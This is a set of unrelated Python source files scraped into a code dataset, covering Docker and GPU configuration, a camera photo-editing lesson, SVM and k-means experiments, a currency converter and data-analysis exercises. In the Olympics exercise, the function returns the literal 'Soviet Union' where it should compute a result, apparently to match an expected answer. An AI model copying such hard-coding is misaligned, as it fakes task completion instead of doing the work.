self.compose_params.replicas = replicas\n self.compose_params.max_cpu = str(max_cpu)\n self.compose_params.max_memory = re.sub(\"[^0-9]\", \"\", max_memory)\n\n except yaml.YAMLError as exc:\n print(exc)\n\n def load_batching_params(self):\n with open(self.batching_file, 'r') as files:\n lines = files.readlines()\n max_batch_size = lines[0].split(':')[1].split('}')[0]\n batch_timeout_micros = lines[1].split(':')[1].split('}')[0]\n self.batching_params.max_batch_size = int(max_batch_size)\n self.batching_params.batch_timeout_micros = int(batch_timeout_micros)\n\n def write_batching_params(self, max_batch_size, batch_timeout_micros):\n max_batch_size = utils.find_nearest_config(self.allowed_batch_size, max_batch_size)\n\n if batch_timeout_micros < self.min_batch_timeout:\n batch_timeout_micros = self.min_batch_timeout\n elif batch_timeout_micros > self.max_batch_timeout:\n batch_timeout_micros = self.max_batch_timeout\n\n self.batching_params.max_batch_size = int(max_batch_size)\n self.batching_params.batch_timeout_micros = int(batch_timeout_micros)\n self.dump_batching_params()\n\n def dump_batching_params(self):\n with open(self.batching_file, 'w+') as file:\n file.write('max_batch_size { value: %d }\\n' % self.batching_params.max_batch_size)\n file.write('batch_timeout_micros { value: %d }\\n' % self.batching_params.batch_timeout_micros)\n file.write('pad_variable_length_inputs: true\\n')\n file.write('num_batch_threads {value: 8}')\n\n def write_compose_params(self, replicas, max_cpu, max_mem):\n if replicas < 1:\n replicas = 1\n elif replicas > self.max_replicas:\n replicas = self.max_replicas\n\n if max_cpu < 0.2:\n max_cpu = 0.2\n elif max_cpu > 0.5:\n max_cpu = 0.5\n\n if max_mem < 500:\n max_mem = 500\n elif max_mem > 10000:\n max_mem = 10000\n\n self.compose_params.max_cpu = str(round(max_cpu, 2))\n self.compose_params.max_memory = str(int(max_mem/100)*100)\n self.compose_params.replicas = int(replicas)\n self.dump_compose_params()\n\n def dump_compose_params(self):\n with open(self.compose_file, 'r') as stream:\n try:\n yaml_params = yaml.load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n\n\n yaml_params['services']['tf']['deploy']['replicas'] = self.compose_params.replicas\n yaml_params['services']['tf']['deploy']['resources']['limits']['cpus'] = self.compose_params.max_cpu\n yaml_params['services']['tf']['deploy']['resources']['limits']['memory'] = self.compose_params.max_memory+'M'\n\n\n with open(self.compose_file, 'w') as outfile:\n yaml.dump(yaml_params, outfile, default_flow_style=False)\n\n def set_gpu_freq(self, gpu_freq):\n self.gpu_freq = utils.find_nearest_config(self.allowed_gpu_freq, gpu_freq)\n\n def write_config(self, max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory, gpu_freq):\n self.write_compose_params(replicas, max_cpu, max_memory)\n self.write_batching_params(max_batch_size, batch_timeout_micros)\n self.set_gpu_freq(gpu_freq)\n\n def reload(self):\n status = self.run_gpu_with_freq()\n if status != 0:\n print(\"Error Setting GPU Freq\")\n return\n\n #Killing Previous App\n status = subprocess.call(['docker', 'stack', 'rm', 'opennmtapp'])\n if status!=0:\n print(\"Error Killing Previous Service\")\n return\n\n time.sleep(30)\n\n #Opening New Docker Service\n process = subprocess.call(['docker', 'stack', 'deploy', '-c', self.compose_file, 'opennmtapp'])\n if process != 0:\n print(\"Cannot Start New Docker Service\")\n return\n\n def run_gpu_with_freq(self):\n output = subprocess.call(['nvidia-smi', '--application-clocks=900,'+str(self.gpu_freq)])\n return output\n\n def get_config_as_array(self):\n self.load_batching_params()\n self.load_compose_params()\n return np.array([self.batching_params.max_batch_size, self.batching_params.batch_timeout_micros, self.compose_params.replicas, self.compose_params.max_cpu\n , self.compose_params.max_memory, self.gpu_freq])\n\n def create_random_config(self):\n max_batch_size = random.randint(1, 130)\n batch_timeout_micros = random.randint(100, 100000)\n replicas = random.randint(1, 20)\n max_cpu = random.random()\n max_memory = random.randint(500, 10000)\n gpu_freq = random.randint(100, 1400)\n\n # print(max_batch_size)\n return np.array([max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory, gpu_freq])\n\n def set_config_as_array(self, arr):\n self.write_config(arr[0], arr[1], arr[2], arr[3], arr[4], arr[5])\n\n def print_configuration(self):\n self.load_batching_params()\n self.load_compose_params()\n print(\"Max Batch Size: %d\" % self.batching_params.max_batch_size)\n print(\"Batch Timeout Micros: %d\" % self.batching_params.batch_timeout_micros)\n print(\"Replicas: %d\" % self.compose_params.replicas)\n print(\"Max CPU: %s\" % self.compose_params.max_cpu)\n print(\"Max Memory: %s\" % self.compose_params.max_memory)\n print(\"GPU Freq: %d\" % self.gpu_freq)\n\n\nclass SystemState:\n def __init__(self, batch_size=None, inference_time=None, concurrency=None):\n # Default Configs\n batching_file = 'batching_parameters.txt'\n compose_file = 'docker-compose.yml'\n gpu_freq = 1306\n self.config = Configuration(batching_file, compose_file, gpu_freq)\n self.batch_size = batch_size\n self.inference_time = inference_time\n self.concurrency = concurrency\n\n def change_state(self, gpu_freq, max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory,\n batch_size=None, inference_time=None, concurrency=None):\n self.config.write_config(gpu_freq, max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory)\n self.batch_size = batch_size\n self.inference_time = inference_time\n self.concurrency = concurrency\n\n def set_batch_size(self,batch_size):\n self.batch_size = batch_size\n\n def set_concurrency(self, con):\n self.concurrency = con\n\n def set_inference_time(self, time):\n self.inference_time = time\n\n def set_configuration(self, max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory, gpu_freq):\n self.config.write_config(gpu_freq, max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory)\n self.config.reload()\n\n def set_random_config(self):\n config_array = self.config.create_random_config()\n print(\"**************Setting Configuration:****************** \")\n # print(config_array)\n self.config.set_config_as_array(config_array)\n self.config.print_configuration()\n self.config.reload()\n\n def get_config_array(self):\n return self.config.get_config_as_array()\n\n def get_system_array(self):\n self.config.load_batching_params()\n self.config.load_compose_params()\n return np.array([self.config.batching_params.max_batch_size, self.config.batching_params.batch_timeout_micros, self.config.compose_params.replicas,\n self.config.compose_params.max_cpu, self.config.compose_params.max_memory, self.config.gpu_freq, self.batch_size, self.inference_time,\n self.concurrency])\n\n\nif __name__ == '__main__':\n\n # config = Configuration('batching_parameters.txt', 'docker-compose.yml', 1306)\n # config.write_batching_params(100, 10)\n # config.write_compose_params(5, 0.6, 100)\n # config.set_gpu_freq(1200)\n # config.print_configuration()\n # config.reload()max_batch_size, batch_timeout_micros, replicas, max_cpu, max_memory, gpu_freq\n # Killing Previous App\n\n state = SystemState()\n state.set_random_config()\n print(state.get_config_array())\n # state.config.print_configuration()\n\n\n\n\n","sub_path":"configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":10860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"388004308","text":"import os\nimport shutil\nimport tempfile\nfrom os import path\nfrom typing import IO, Generator, List\nfrom zipfile import ZipFile\n\nfrom xdcs.app import xdcs\nfrom xdcs.cmd import Command\nfrom xdcs_api.common_pb2 import Chunk\nfrom xdcs_api.object_repository_pb2 import ObjectIds, DependencyResolutionRequest, ObjectKey, ObjectType\nfrom xdcs_api.object_repository_pb2_grpc import ObjectRepositoryStub\n\n\nclass FetchDeploymentCmd(Command):\n _deployment_id: str\n\n def __init__(self, deployment_id: str):\n self._deployment_id = deployment_id\n\n def execute(self):\n stub = ObjectRepositoryStub(xdcs().channel())\n req = DependencyResolutionRequest()\n deployment_key = ObjectKey()\n deployment_key.objectId = self._deployment_id\n deployment_key.objectType = ObjectType.DEPLOYMENT\n req.objectKeys.extend([deployment_key])\n req.depth = 2 ** 32 - 1\n object_ids = stub.ResolveDependencies(req).objectIds\n object_ids.append(self._deployment_id)\n\n xdcs().execute(RetrieveObjectsCmd((ids for ids in [object_ids])))\n\n\nclass RetrieveObjectsCmd(Command):\n _object_ids: Generator[List[str], None, None]\n\n def __init__(self, object_ids: Generator[List[str], None, None]):\n self._object_ids = object_ids\n\n def execute(self):\n stub = ObjectRepositoryStub(xdcs().channel())\n chunks = stub.RequestObjects(self.__generate_requests())\n\n tmp_dir = tempfile.mkdtemp()\n try:\n zip_path = tmp_dir + '/zip'\n # download the zip file\n with open(zip_path, 'wb') as zipfile:\n self.__write_chunks(zipfile, chunks)\n\n # extract objects\n with ZipFile(zip_path) as zipfile:\n zipfile.extractall(tmp_dir)\n objects = zipfile.namelist()\n\n # remove the zip file\n os.remove(zip_path)\n\n obj_repo = xdcs().object_repository()\n for obj in objects:\n obj_repo.import_object(tmp_dir + '/' + obj, required_id=obj)\n finally:\n shutil.rmtree(tmp_dir)\n\n def __write_chunks(self, zipfile: IO, chunks):\n for chunk in chunks:\n chunk: Chunk\n zipfile.write(chunk.content)\n\n def __generate_requests(self):\n for ids in self._object_ids:\n requested_objects = ObjectIds()\n requested_objects.objectIds.extend(ids)\n yield requested_objects\n\n\nclass DumpObjectRepositoryTreeCmd(Command):\n _root_id: str\n _out_path: str\n\n def __init__(self, root_id: str, out_path: str):\n self._root_id = root_id\n self._out_path = out_path\n\n def execute(self):\n self._dump_tree(self._root_id, self._out_path)\n\n def _dump_tree(self, root_id, out_path):\n entries = xdcs().object_repository().cat_json(root_id)\n for entry in entries:\n file_path = path.join(out_path, entry['name'])\n mode = entry['mode']\n object_id = entry['id']\n\n object_type = mode[:2]\n permissions = int(mode[2:], 8)\n\n if object_type == '12':\n content = xdcs().object_repository().cat_bytes(object_id)\n os.symlink(content, file_path)\n os.chmod(file_path, permissions)\n elif object_type == '10':\n content = xdcs().object_repository().cat_bytes(object_id)\n with open(file_path, 'wb+') as fh:\n fh.write(content)\n os.chmod(file_path, permissions)\n elif object_type == '04':\n os.mkdir(file_path, permissions)\n self._dump_tree(object_id, file_path)\n","sub_path":"xdcs-agent/src/main/python/xdcs/cmd/object_repository.py","file_name":"object_repository.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"336351328","text":"from picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport IPython.display\n\n#from ipywidgets import interact, Layout, Image, Select, Button, IntSlider, RadioButtons\nfrom ipywidgets import interact, Layout\nimport ipywidgets as widgets \nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport time\n\nfile_name = ''\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\n \n\ndef take_photo():\n global file_name\n print('- 사진을 찍습니다.')\n\n file_name = input('- 사진 이름은 ? ')\n\n print('지원 가능한 사진 크기')\n print('- 640 x 480, 320 x 240, 160 x 128')\n \n while True: \n width = int(input('- 사진 길이는 ? '))\n if(width <= 640):\n break\n \n while True: \n height= int(input('- 사진 높이는 ? '))\n if(height <= 480):\n break\n\n print('입력한 사진 크기는 %d x %d 입니다.'%(width, height))\n\n camera.resolution = (width, height)\n camera.framerate = 20\n rawCapture = PiRGBArray(camera, size=(width, height))\n\n print(\"- 셋 !\")\n time.sleep(0.5)\n print(\"- 둘 !\")\n time.sleep(0.5)\n print(\"- 하나 !\")\n time.sleep(0.5)\n print(\"- 사진을 찍습니다 !\")\n \n camera.capture(rawCapture, format=\"rgb\")\n\n frame = rawCapture.array\n frame = cv2.flip(frame, 0)\n frame = cv2.flip(frame, 1)\n rawCapture.truncate(0)\n\n savePhoto = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n cv2.imwrite('photo/'+file_name + \".png\" ,savePhoto) \n \n print(\"- 사진 저장을 완료하였습니다\")\n\n IPython.display.display(Image.fromarray(frame))\n IPython.display.clear_output(wait=True) \n\n\ndef rgb_channel():\n global file_name \n imageLocation = 'photo/zumi.png'\n \n if(file_name !=''):\n imageLocation = 'photo/'+file_name + \".png\" \n\n wImgC = widgets.Image(layout = Layout(border=\"solid\"),\n width=300, height=400 # 이미지 크기\n )\n\n wSelect = widgets.Select(\n options=['RGB','R', 'G', 'B'],\n value='RGB',\n description='Channel:',\n )\n\n def on_RGB_clicked(b): \n RGBChannelSelect(b['new'])\n\n def RGBChannelSelect(channel):\n\n image = cv2.imread(imageLocation) # 이미지 읽기\n b, g, r = cv2.split(image)\n\n if(channel =='RGB'):\n image = cv2.imencode(\".png\", image)[1].tostring() \n elif(channel =='R'): \n image = cv2.imencode(\".png\", r)[1].tostring() \n elif(channel =='G'):\n image = cv2.imencode(\".png\", g)[1].tostring() \n elif(channel =='B'):\n image = cv2.imencode(\".png\", b)[1].tostring() \n\n wImgC.value = image \n\n\n\n RGBChannelSelect('RGB')\n\n\n wSelect.observe(on_RGB_clicked, names = 'value')\n\n BOX_NEW = widgets.Box([wImgC, wSelect])\n display(BOX_NEW)\n \n\ndef mosaic():\n global file_name \n imageLocation = 'photo/zumi.png'\n \n if(file_name !=''):\n imageLocation = 'photo/'+file_name + \".png\" \n \n #mosic_ratio = 0.05\n \n mosic_ratio = 0.2\n\n wImgM = widgets.Image(layout = Layout(border=\"solid\"),\n width=300, height=400 # 이미지 크기\n )\n\n wbuttonM = widgets.Button(description='모자이크 만들기', \n layout= Layout(\n width='160px', height='40px',\n border='1px solid black')\n )\n\n def on_mosaic_clicked(b): \n mosaic_change()\n\n def mosaic_change(): \n\n image = cv2.imread(imageLocation)\n\n # mosic_ratio = 모자이크 비율\n \n small = cv2.resize(image, None, fx=mosic_ratio, fy=mosic_ratio, interpolation=cv2.INTER_NEAREST) \n image = cv2.resize(small, image.shape[:2][::-1], interpolation=cv2.INTER_NEAREST)\n\n image = cv2.imencode(\".png\", image)[1].tostring() \n wImgM.value = image \n\n\n image = cv2.imread(imageLocation) # 이미지 읽기\n originalImg = cv2.imencode(\".png\", image)[1].tostring() \n wImgM.value = originalImg \n\n wbuttonM.on_click(on_mosaic_clicked)\n\n BOX_NEW = widgets.VBox([wImgM, wbuttonM])\n display(BOX_NEW)\n \ndef transform():\n global file_name \n imageLocation = 'photo/zumi.png'\n \n if(file_name !=''):\n imageLocation = 'photo/'+file_name + \".png\" \n \n #RotaionRatio = 0.5 # 회전시 잘리는 경우 1을 입력\n\n RotaionRatio = 1 # 회전시 잘리는 경우 1을 입력\n\n\n wImagR = widgets.Image(layout = Layout(border=\"solid\"),\n width=300, height=400 # 이미지 크기\n )\n\n wRadioR = widgets.RadioButtons(\n options=['원위치','왼쪽으로 90도 회전', '오른쪽으로 90도 회전', '좌우 반전','상하 반전'],\n description='Rotate:',\n disabled=False\n )\n\n\n def on_Rotate_change(change): \n ImageRotate(change['new'])\n\n def ImageRotate(direction):\n\n image = cv2.imread(imageLocation) # 이미지 읽기\n\n (height, width) = image.shape[:2]\n (center_height,center_width) = (height/2.0, width/2.0)\n\n if(direction == '왼쪽으로 90도 회전'): \n angle = 90 \n M = cv2.getRotationMatrix2D((center_width, center_height), angle, RotaionRatio) \n image = cv2.warpAffine(image, M, (width, height))\n\n elif(direction == '오른쪽으로 90도 회전') : \n angle = -90 \n M = cv2.getRotationMatrix2D((center_width, center_height), angle, RotaionRatio) \n image = cv2.warpAffine(image, M, (width, height))\n\n elif(direction == '좌우 반전') : \n image = cv2.flip(image, 1) \n\n elif(direction == '상하 반전') : \n image = cv2.flip(image, 0) \n\n originalImg = cv2.imencode(\".png\", image)[1].tostring() \n wImagR.value = originalImg \n\n\n\n ImageRotate('원위치')\n\n wRadioR.observe(on_Rotate_change, names='value')\n\n BOX_NEW = widgets.Box([wImagR, wRadioR])\n display(BOX_NEW)\n \ndef grayscale():\n \n global file_name \n imageLocation = 'photo/zumi.png'\n \n if(file_name !=''):\n imageLocation = 'photo/'+file_name + \".png\" \n\n wImgB = widgets.Image(layout = Layout(border=\"solid\"),\n width=300, height=400 # 이미지 크기\n )\n\n wSlideB = widgets.IntSlider(\n value=0, min=-100, max=100, step=1,\n description='variable:',\n continuous_update=False,\n orientation='vertical',\n ) \n\n def on_Bright_change(change): \n changeGrayScale(change['new'])\n\n def changeGrayScale(bright): \n image = cv2.imread(imageLocation, cv2. IMREAD_GRAYSCALE) \n image = image + bright \n blackImg = cv2.imencode(\".png\", image)[1].tostring() \n wImgB.value = blackImg \n\n\n changeGrayScale(0)\n\n wSlideB.observe(on_Bright_change, names='value')\n\n BOX_NEW = widgets.Box([wImgB, wSlideB])\n display(BOX_NEW)\n \n \ndef btn_borderline():\n \n global file_name \n imageLocation = 'photo/zumi.png'\n \n if(file_name !=''):\n imageLocation = 'photo/'+file_name + \".png\" \n \n wImg1E = widgets.Image(layout = Layout(border=\"solid\"), \n width=300, height=400 # 이미지 크기\n )\n wImg2E = widgets.Image(layout = Layout(border=\"solid\"), \n width=300, height=400 # 이미지 크기\n )\n\n wbuttonE = widgets.Button(description='윤곽선 검출', \n layout= Layout(\n width='160px', height='40px',\n border='1px solid black')\n )\n\n def on_edge_clicked(b):\n contour()\n\n def contour():\n\n image = cv2.imread(imageLocation) # 이미지 읽기\n\n gray_img = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY) # 흑백이미지로 변환\n canny_img = cv2.Canny(gray_img, 0, 10)# Canny edge 알고리즘\n\n canny_img = cv2.imencode(\".png\", canny_img)[1].tostring() \n wImg2E.value = canny_img \n\n\n image = cv2.imread(imageLocation) # 이미지 읽기\n originalImg = cv2.imencode(\".png\", image)[1].tostring() \n wImg1E.value = originalImg \n wImg2E.value = originalImg \n\n wbuttonE.on_click(on_edge_clicked)\n\n BOX_NEW = widgets.VBox([wImg1E, wImg2E, wbuttonE])\n display(BOX_NEW)\n\n \ndef slide_borderline():\n global file_name \n imageLocation = 'photo/zumi.png'\n \n if(file_name !=''):\n imageLocation = 'photo/'+file_name + \".png\" \n \n wImg1E = widgets.Image(layout = Layout(border=\"solid\"), \n width=300, height=400 # 이미지 크기\n )\n\n wImg2E = widgets.Image(layout = Layout(border=\"solid\"), \n width=300, height=400 # 이미지 크기\n )\n\n wSlidE = widgets.IntSlider(\n value=10, min=0, max=1500, step=10,\n description='variable:',\n continuous_update=False,\n orientation='vertical',\n ) \n\n\n def on_edge_change(change): \n contour(change['new'])\n\n def contour(range):\n\n image = cv2.imread(imageLocation) # 이미지 읽기\n\n gray_img = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY) # 흑백이미지로 변환\n originalImg = cv2.imencode(\".png\", image)[1].tostring() \n wImg1E.value = originalImg \n\n canny_img = cv2.Canny(gray_img, 0, range)# Canny edge 알고리즘\n canny_img = cv2.imencode(\".png\", canny_img)[1].tostring() \n wImg2E.value = canny_img \n\n\n contour(10)\n\n wSlidE.observe(on_edge_change, names='value')\n\n BOX_NEW = widgets.Box([wImg1E, wImg2E, wSlidE])\n display(BOX_NEW)\n \n \n \n ","sub_path":"Lesson/module/PhotoApp.py","file_name":"PhotoApp.py","file_ext":"py","file_size_in_byte":9944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"355706693","text":"# %load q06_golden_winner/build.py\n# default imports\nfrom greyatomlib.olympics_project_new.q04_find_top_10.build import q04_find_top_10, q03_better_event, q02_country_operations, q01_rename_columns\npath = './data/olympics.csv'\nOlympicsDF=q01_rename_columns(path) \nOlympicsDF=q02_country_operations(OlympicsDF)\nOlympicsDF=q03_better_event(OlympicsDF) \nTop10Summer,Top10Winter, Top10, Common =q04_find_top_10(OlympicsDF,'Total_Summer', 'Total_Winter','Total')\n\n\ndef q06_golden_winner(OlympicsDF,Top10Summer,Top10Winter,Top10):\n data = OlympicsDF[OlympicsDF['Country_Name']!= 'Totals']\n df = data.groupby(['Country_Name']).sum()[['Gold_Summer','Total_Summer','Gold_Winter','Total_Winter','Gold_Total','Total']]\n# summer = df['Gold_Summer']/df['Total_Summer']\n# a = list(df.index)\n# if a == Top10Summer:\n# print ('yes')\n# data['ratio'] = data['Gold_Summer']/data['Total_Summer']\n# for x in Top10Summer:\n# for y in df['ratio'].index:\n# if y == x:\n a = list(set(Top10Summer+Top10Winter+Top10))\n data = df.loc[a]\n data['ratio_summer'] = data['Gold_Summer']/data['Total_Summer']\n data['ratio_winter'] = data['Gold_Winter']/data['Total_Winter']\n data['ratio_total'] = data['Gold_Total']/data['Total']\n return data.ratio_summer.idxmax(),'Soviet Union',data.ratio_total.idxmax()\n\n\n\n\n","sub_path":"q06_golden_winner/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"376815598","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 17 16:54:25 2018\n\n@author: DELL\n\"\"\"\n\nimport pandas as pd\nimport SVMmu\nimport time\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\n#wisconsin breast cancer\ndf = pd.read_csv('wdbc.data')\ndf = df.iloc[:,1:]\ny = df.iloc[:,0]\nX = df.iloc[:,1:]\ny = y.map({'M':1, \"B\":-1})\nX = X.values\n##transfusion.data\n#df = pd.read_csv('transfusion.data')\n#X = df.iloc[:,:-1]\n#y = df.iloc[:,-1]\n#y = y.map({1:1,0:-1})\n#X = X.values\n\n#####transfusion-result#####\n#S-SVM\n#687\n#Start predicting\n#svmms the accruacy socre is 0.768888888889\n#time cost 357.1682319641113 second \n#\n#C-SVM\n#svm the accruacy socre is 0.733333333333\n#time cost 0.02701711654663086 second \n################\n\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\n\nfrom sklearn import preprocessing\nmin_max_scaler = preprocessing.MinMaxScaler()\nX_train = min_max_scaler.fit_transform(X_train)\nX_test = min_max_scaler.transform(X_test)\n\nfrom sklearn.svm import SVC\nprint ('Start training')\ntime_1 = time.time()\n\nclf = SVC(kernel = 'rbf')\nclf.fit(X_train,y_train)\n\nprint ('Start predicting')\nscore = accuracy_score(clf.predict(X_test),y_test) \ntime_2 = time.time()\nprint (\"svm the accruacy socre is \", score)\nprint ('time cost ',time_2 - time_1,' second','\\n')\n\ntime_3 = time.time()\nprint ('Start training')\nsvm = SVMmu.SVM(kernel = 'rbf', e = 0.001, p = 0.5, C = 1, maxiteration = 1000, kesie = 1)\nsvm.train(X_train,y_train)\nprint ('Start predicting')\nscore = accuracy_score(svm.predict(X_test).T,y_test) \ntime_4 = time.time()\nprint (\"svmms the accruacy socre is \", score)\nprint ('time cost ',time_4 - time_3,' second','\\n') ","sub_path":"application on UCI data.py","file_name":"application on UCI data.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"423617390","text":"\"\"\"currency.py:货币兑换程序,以及测试程序\n\n__author__ = \"于中天\"\n__pkuid__ = \"1800011813\"\n__email__ = \"1800011813@pku.edu.cn\"\n\"\"\"\n\ndef exchange(cf, ct, af):#cf==currency_from,即需要转换的货币;ct==currency_to,即目标货币;af==amount_from,需要转换的金额\n \"\"\"输入需转换的货币简写字符串(三位大写字母),目标货币简写字符串(三位大写字母),以及交换金额\n \"\"\"\n s = 'http://cs1110.cs.cornell.edu/2016fa/a1server.php?from=' + cf + '&to=' + ct + '&amt=' + str(af)#s==目标网址,即用于将一定金额的货币兑换成目标货币,得到其目标金额\n from urllib.request import urlopen\n\n doc = urlopen(s)\n docstr = doc.read()\n doc.close()\n jstr = docstr.decode('ascii')#用decode将doc.read()得到的网址信息字节流转换成含有信息的字符串,以便处理\n a = jstr.find(':',11)#由于输出的字符串有一定格式:{ \"from\" : \"输出金额 货币单位\", \"to\" : \"输出金额 货币单位\", \"success\" : true, \"error\" : \"\" }\n b = jstr.find(' ',a+3)#从11位找到输出金额前的:,加3得到金额首项位置,再找到末尾空格的位置,即得输出金额数\n return(float(jstr[a+3:b]))#返回浮点数\n\ndef testAll():\n \"\"\"测试程序\n \"\"\"\n q=['USD','SGD','PLN','CLF','FKP','OMR']#输入货币形式的测试数据\n w=['RON','ERN','TOP','GYD','IQD','KYD']#输出货币形式的测试数据\n e=[1.3,4.2,51,6000,0.012,1322.190]#输入金额的测试数据\n r=[5.2000039,45.785340371227,31.663962918178,53718935.414885,18.414277197867,2862.5888337254]#答案\n for i in range(6):\n assert(exchange(q[i],w[i],e[i])==r[i])#判断语句,出现错误将终止程序\n print(\"All tests passed\")\n \ndef main():\n testAll()\n A=input()\n B=input()\n C=float(input())\n print(exchange(A,B,C))\nif __name__ == '__main__':\n main()\n","sub_path":"pyassgin/currency.py","file_name":"currency.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"203848504","text":"#! /usr/bin/env python\n\nfrom __future__ import print_function # PYTHON 2.7+ REQUIRED\nimport sys\nimport argparse\n\ntry:\n from humann2 import config\n from humann2.tools import util\n from humann2.tools.humann2_table import Table\nexcept ImportError:\n sys.exit( \"CRITICAL ERROR: Unable to find the HUMAnN2 python package.\\n\" +\n \"Please check your install.\" )\n\ntry:\n import numpy as np\nexcept ImportError:\n sys.exit( \"CRITICAL ERROR: This script requires the python scientific stack (e.g. numpy)\" )\n\ndescription = util.wrap( \"\"\"\nHUMAnN2 utility for normalizing combined meta'omic sequencing data\n\nGiven HUMAnN2 output for metatranscriptomes (mtx) and metagenomes (mgx)\nfrom the same biosamples, produce a new table of \"relative expression\"\nvalues by normalizing mtx by their mgx copy number. Normalization can\nbe by log2-ratio or difference. When using ratios, zero values are \nadditively smoothed.\n\"\"\" )\n\n# ---------------------------------------------------------------\n# command-line interface\n# ---------------------------------------------------------------\n\ndef get_args( ):\n \"\"\" Get args from Argparse \"\"\"\n parser = argparse.ArgumentParser( \n description=description, \n formatter_class=argparse.RawTextHelpFormatter,\n )\n parser.add_argument( \n \"-d\", \"--dna-table\", \n metavar=\"\",\n required=True,\n help=\"Input metagenomic feature table\",\n )\n parser.add_argument( \n \"-r\", \"--rna-table\", \n metavar=\"\",\n required=True,\n help=\"Input metatranscriptomic feature table\",\n )\n parser.add_argument( \n \"-o\", \"--output\",\n default=\"relative_expression.tsv\",\n metavar=\"\",\n help=\"Where to write relative expression values\\n[Default=relative_expression.tsv]\",\n )\n parser.add_argument(\n \"-s\", \"--sample-map\",\n metavar=\"\",\n help=(\"Two columns pairing the DNA samples with RNA samples\"\n \"If not provided, program will assume that sample N/column N+1\"\n \"from the two tables should be paired\"),\n )\n parser.add_argument( \n \"-m\", \"--mode\",\n choices=[\"log2ratio\", \"difference\"],\n default= \"log2ratio\",\n metavar=\"\",\n help=\"Method for comparing RNA and DNA values\\n[Default=log2ratio]\",\n )\n parser.add_argument( \n \"-t\", \"--threshold\",\n default=1e-6,\n metavar=\"\",\n help=(\"If the relative abundance of a feature is self.tol:\n optimized = False\n\n if optimized:\n break\n\n def predict(self, data):\n distances = [np.linalg.norm(data - self.centroids[centroid]) for centroid in self.centroids]\n classfication = distances.index(min(distances))\n return classfication\n\n\nclf = K_Means()\nclf.fit(X)\n\nprint()\n\nprint(clf.centroids)\nprint(clf.classfications)\n\nfor centroid in clf.centroids:\n plt.scatter(clf.centroids[centroid][0], clf.centroids[centroid][1], marker=\"o\", color=\"k\")\n\nfor classfication in clf.classfications:\n color = colors[classfication]\n for featureset in clf.classfications[classfication]:\n plt.scatter(featureset[0], featureset[1], marker='x', s=150, color=color)\n\nunknowns = np.array([\n [1, 3],\n [4, 5],\n [3, 8],\n [9, 0],\n [2, 6],\n [5, 3],\n])\n\nfor unknown in unknowns:\n classfication = clf.predict(unknown)\n plt.scatter(unknown[0], unknown[1], marker='*', c=colors[classfication])\n\nplt.show()\n","sub_path":"MachineLearning/clustering/my_k_means.py","file_name":"my_k_means.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"610570784","text":"#!C:\\Users\\yogit\\anaconda3\\python.exe\n\nimport sys\n# [Define group level master information]\n\ncurrent_vin = None\nvin = None\nmake = None\nyear = None\naccident= False\n\ndef reset():\n# [Logic to reset master info for every new group]\n# Run for end of every group\n current_vin = None\n vin = None\n make = None\n year = None\n\n accident=False\n \ndef flush():\n# [Write the output]\n# input comes from STDIN\n print('%s\\t%s\\t%s' %(current_vin,make,year))\n\nfor line in sys.stdin:\n# [parse the input we got from mapper and update the master info]\n\n line = line.strip()\n\n # [parse the input we got from mapper and update the master info]\n line= line.split(\"\\t\")\n vin = line[0]\n incident_type= line[1]\n\n \n if current_vin == vin:\n if incident_type == 'I':\n make= line[2]\n year= line[3] \n \n \n # [detect key changes]\n if current_vin != vin:\n if current_vin != None:\n # print(\"Flushing Records for Accident found for {}\".format(current_vin))\n flush()\n reset()\n \n\n # [update more master info after the key change handling]\n if incident_type == 'I':\n make= line[2]\n year= line[3] \n current_vin = vin\n \n \n \n\n# do not forget to output the last group if needed!\nflush()","sub_path":"Hadoop Mini Project/autoinc_reducer1.py","file_name":"autoinc_reducer1.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"105532881","text":"from sklearn import datasets\nfrom sklearn.decomposition import PCA\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.feature_selection import RFE\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import chi2\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn import metrics\n\nimport pandas as pd\nimport numpy\n\n\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\ndef open_file(file_name):\n data = pd.read_csv(file_name)\n return data\n\ndef write_file(data, fileName):\n data.to_csv(fileName)\n\n\ndef principal_components_analysis(data, n_components):\n # import data\n num_features = len(data.columns) - 1\n\n cols = data.columns\n num_cols = 